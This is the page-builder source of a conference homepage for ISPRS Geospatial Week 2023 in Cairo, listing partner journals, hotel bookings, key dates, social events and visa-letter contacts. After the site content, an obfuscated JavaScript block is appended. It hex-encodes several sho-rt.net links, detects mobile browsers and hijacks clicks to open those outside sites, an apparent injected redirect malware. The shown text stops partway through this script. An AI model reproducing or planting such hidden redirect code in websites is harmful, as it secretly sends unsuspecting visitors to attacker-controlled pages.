css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 